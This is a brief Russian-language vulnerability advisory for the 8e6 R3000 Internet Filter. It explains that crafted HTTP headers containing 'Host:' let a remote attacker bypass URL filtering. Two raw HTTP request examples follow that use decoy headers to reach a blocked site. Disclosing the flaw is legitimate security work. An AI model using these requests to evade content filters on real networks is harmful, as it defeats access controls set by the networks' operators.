Программа: 8e6 R3000 Internet Filter

Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за ошибки в проверке
входных данных в фильтре URL при обработке кастомизированных HTTP заголовков.
Атакующий может передать специально сформированные HTTP заголовки, содержащие
строку "Host:", за которой следует запрещенный сайт, что приведет к обходу URL
фильтрации.

Эксплоит:

GET / HTTP/1.0
X-DecoyHost: www.allowed.org
Host: www.blocked.org
GET / HTTP/1.0
X-Decoy: Host: www.allowed.org
Host: www.blocked.org



Оставить мнение